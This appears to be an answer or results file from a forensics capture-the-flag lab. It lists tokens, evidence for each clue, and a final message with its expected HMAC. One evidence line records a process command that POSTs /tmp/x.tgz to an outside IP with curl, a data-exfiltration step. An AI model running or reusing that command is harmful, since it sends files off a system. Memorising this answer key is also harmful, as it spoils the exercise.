TOKEN[KEYPAD]=21048
EVIDENCE[KEYPAD].TOP24=203.0.113.0/24
EVIDENCE[KEYPAD].COUNT=48
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:01:09Z lab1 sshd[3219]: Failed password for deploy from 203.0.113.225 port 56197 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=3
TOKEN[DNS]=lines
EVIDENCE[DNS].KEY=hint4
EVIDENCE[DNS].DECODED_LINE=Signals converge in the switch if you read between lines
TOKEN[SAFE]=14-12-26
EVIDENCE[SAFE].MATCH=SAFE{14-12-26}
EVIDENCE[SAFE].CHECK=14+12=26
TOKEN[PID]=201
EVIDENCE[PID].PATH=[193->196->197->201]
EVIDENCE[PID].CMD="sh -c 'curl -X POST http://198.51.100.33/upload -d @/tmp/x.tgz'"
FINAL_GATE=PENDING
MSG=msc-group-03|21048-14-12-26-lines-201
EXPECTED_HMAC=51be28900f8b2f5201908793f7734ea63d15ad43963b5e07ed48048efe71adee